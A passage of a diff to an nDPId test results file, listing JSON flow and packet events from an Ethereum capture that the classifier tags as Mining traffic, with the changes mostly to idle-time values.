+00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1071,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365189,"flow_last_seen":1578508365225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":508,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1578508365225,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"85.214.108.52","src_port":56654,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1083,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365226,"flow_last_seen":1578508365226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365226,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.75.171.190","src_port":56657,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1083,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1578508365226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365226,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGQk7AqAG4ikurvt1Rdl8erUWUAAAAALAC\/\/\/M9wAAAgQFtAEDAwUBAQgKItiW0AAAAAAEAgAA"} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1104,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365239,"flow_last_seen":1578508365239,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365239,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"157.230.152.87","src_port":56658,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1104,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1578508365239,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365239,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGQhrAqAG4neaYV91Sdl9OT1qyAAAAALAC\/\/+H9wAAAgQFtAEDAwUBAQgKItiW2wAAAAAEAgAA"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1189,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365271,"flow_last_seen":1578508365271,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365271,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.161.23.12","src_port":56660,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1189,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1578508365271,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365271,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGLavAqAG4M6EXDN1Udl9XVw7PAAAAALAC\/\/+2RQAAAgQFtAEDAwUBAQgKItiW9wAAAAAEAgAA"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1195,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365279,"flow_last_seen":1578508365279,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365279,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.9.128.68","src_port":56661,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1195,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1578508365279,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365279,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGxArAqAG4NAmARN1Vdl\/t7etbAAAAALAC\/\/\/ZeQAAAgQFtAEDAwUBAQgKItiW\/gAAAAAEAgAA"} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1208,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365295,"flow_last_seen":1578508365295,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365295,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.229.232.19","src_port":56662,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1208,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1578508365295,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365295,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGbF\/AqAG4I+XoE91Wdl\/o6wkCAAAAALAC\/\/9pGwAAAgQFtAEDAwUBAQgKItiXDAAAAAAEAgAA"} 
+00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1220,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365300,"flow_last_seen":1578508365300,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365300,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"124.217.235.180","src_port":56663,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1220,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1578508365300,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365300,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGD8rAqAG4fNnrtN1Xdl9L2gYiAAAAALAC\/\/+scgAAAgQFtAEDAwUBAQgKItiXEAAAAAAEAgAA"} 00641{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1239,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1578508365315,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":192,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":192,"pkt_l4_len":158,"thread_ts_msec":1578508365315,"pkt":"KDc3AG3IEBMx8Tl2CABFAACymwlAACMRP1cS26efwKgBuHZfdl8AnsFrVj4puAH6ZgARKbHJmno0oUTDSx6ME3WyQvgYFdLFf82IMxF0n+9n2kTCv9WKp0W5OWAeoQIHesUQlOhBZUox8XuUKjSw2r\/cLxIh6clEUwjRudwx4mptlXU2a3WMaDxBAALzy4RPFs69gun3gnZfoAez3OWZbA2U21K6mmqEcXi9Zewq23MX\/wTlxWTRncmbhF4WIGEK"} 
00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1240,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1578508365315,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508365315,"pkt":"KDc3AG3IEBMx8Tl2CABFAACcmwpAACMRP2wS26efwKgBuHZfdl8AiLphceZOwZGufNXFAvXWI774ooc6PkwC6kxvzCm0BhiTs\/TWig3gE4P3+Y0lY\/Fll4rTUKnacLSuqKdSUAk7eTbz218E2dS8j3sLMJigll9ziTSt7jKgE6R7GxELpoJhO+ReAQHdBMuEEtunn4J2X4J2X8mETxbOvYLp94CEXhYgYQo="} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1315,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365408,"flow_last_seen":1578508365408,"flow_idle_time":180000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1578508365408,"l3_proto":"ip4","src_ip":"183.129.242.164","dst_ip":"192.168.1.184","src_port":1024,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -248,187 +248,187 @@ 00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1315,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365408,"flow_last_seen":1578508365408,"flow_idle_time":180000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1578508365408,"l3_proto":"ip4","src_ip":"183.129.242.164","dst_ip":"192.168.1.184","src_port":1024,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00642{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1316,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1578508365409,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":192,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":192,"pkt_l4_len":158,"thread_ts_msec":1578508365409,"pkt":"EBMx8Tl2KDc3AG3ICABFAACy8oAAAEARGzTAqAG4t4HypHZfBAAAnqbvG70JBv5PXjvCBbR1Rp7tYoTQJi2jMUD7JOn6eWv9REwRmFSXtYoHsvszWP\/amLZkv0asbrMZoJOaxU2yggG3KzVpk0IKmRZiX\/KGqSOqaOPD2NnZ\/WIPpNjQN9gDidCOAQLzy4S3gfKkggQAgnZfoN1ZCrowRPSuYImDKDaLW7euccXe5KN1UlyoEwkmrqcShF4WIGEF"} 
00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1317,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1578508365409,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508365409,"pkt":"EBMx8Tl2KDc3AG3ICABFAACc4fIAAEARK9jAqAG4t4HypHZfBAAAiACVOpGBWjTeJor2OHTFdIkJfHanNwusT7Z+X6ZhMccUpEYH1blVudB+7Lhiy59WZ4RAivu0dgr\/6z5c18c2wNa0j2NMO4UV7uXk8QqS8l0iv7COflKJEb7GBR6jLr1IE7ZSAQHdBMuEfwAAAYJ2X4J2X8mEt4HypIIEAICEXhYgYQU="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1318,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1578508365411,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365411,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGPK8zoRcMwKgBuHZf3VQuhVQAV1cO0KAScSARYwAAAgQFrAQCCAo+6INOItiW9wEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1319,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1578508365411,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365411,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGLbfAqAG4M6EXDN1Udl9XVw7QLoVUAYAQECygnAAAAQEICiLYl3Y+6INO"} 
-00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1320,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365271,"flow_last_seen":1578508365413,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":573,"flow_tot_l4_payload_len":573,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1578508365413,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.161.23.12","src_port":56660,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1321,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1578508365419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365419,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAGUh6d5phXwKgBuHZf3VIVkuQhTk9as6AScSDAlwAAAgQFrAQCCAq827CpItiW2wEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1322,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1578508365419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365419,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGQibAqAG4neaYV91Sdl9OT1qzFZLkIoAQECxPsAAAAQEICiLYl3u827Cp"} 
-00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1323,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365239,"flow_last_seen":1578508365420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":583,"flow_tot_l4_payload_len":583,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1578508365420,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"157.230.152.87","src_port":56658,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1339,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1578508365458,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365458,"pkt":"KDc3AG3IEBMx8Tl2CABFCAA8AABAACwG2AY0CYBEwKgBuHZf3VXR7JfX7e3rXKASaN9TlwAAAgQFrAQCCAqDIEEYItiW\/gEDAwc="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1340,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1578508365458,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365458,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGxBbAqAG4NAmARN1Vdl\/t7etc0eyX2IAQECzabQAAAQEICiLYl5+DIEEY"} 
-00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1341,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365279,"flow_last_seen":1578508365460,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":472,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508365460,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.9.128.68","src_port":56661,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1318,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1578508365411,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365411,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGPK8zoRcMwKgBuHZf3VQuhVQAV1cO0KAScSARYwAAAgQFrAQCCAo+6INOItiW9wEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1319,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1578508365411,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365411,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGLbfAqAG4M6EXDN1Udl9XVw7QLoVUAYAQECygnAAAAQEICiLYl3Y+6INO"} 
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1320,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365271,"flow_last_seen":1578508365413,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":573,"flow_tot_l4_payload_len":573,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1578508365413,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.161.23.12","src_port":56660,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1321,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1578508365419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365419,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAGUh6d5phXwKgBuHZf3VIVkuQhTk9as6AScSDAlwAAAgQFrAQCCAq827CpItiW2wEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1322,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1578508365419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365419,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGQibAqAG4neaYV91Sdl9OT1qzFZLkIoAQECxPsAAAAQEICiLYl3u827Cp"} 
+00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1323,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365239,"flow_last_seen":1578508365420,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":583,"flow_tot_l4_payload_len":583,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1578508365420,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"157.230.152.87","src_port":56658,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1339,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1578508365458,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365458,"pkt":"KDc3AG3IEBMx8Tl2CABFCAA8AABAACwG2AY0CYBEwKgBuHZf3VXR7JfX7e3rXKASaN9TlwAAAgQFrAQCCAqDIEEYItiW\/gEDAwc="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1340,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1578508365458,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365458,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGxBbAqAG4NAmARN1Vdl\/t7etc0eyX2IAQECzabQAAAQEICiLYl5+DIEEY"} 
+00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1341,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365279,"flow_last_seen":1578508365460,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":472,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508365460,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.9.128.68","src_port":56661,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1342,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365461,"flow_last_seen":1578508365461,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365461,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1342,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1578508365461,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508365461,"pkt":"EBMx8Tl2KDc3AG3ICABFAACcQtMAAEARjkPAqAG4ynAcanZfdl8AiDkPCEixaJX\/9thQC0r9cGcsCeen+iETb10JXBU9BZQL28M1nK8vCE6bMd2SC2XGliMqSbi8oqYHUjyrBa753h2KySNTFNso18+nMzMVWvdibnHX4lluxe+\/vRPiYB2kYX3uAAHdBMuEfwAAAYJ2X4J2X8mEynAcaoJ2X4CEXhYgYQU="} 
00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1342,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365461,"flow_last_seen":1578508365461,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365461,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1343,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1578508365465,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365465,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACsGNXy2oqE9wKgBuHZf3Ueh\/8nUB338R6ASOJDbwAAAAgQFrAQCCAo8EmDbItiWYAEDAwc="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1344,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1578508365465,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365465,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGIITAqAG4tqKhPd1Hdl8HffxHof\/J1YAQECwxpAAAAQEICiLYl6U8EmDb"} 
-00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1345,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365094,"flow_last_seen":1578508365466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":522,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1578508365466,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"182.162.161.61","src_port":56647,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 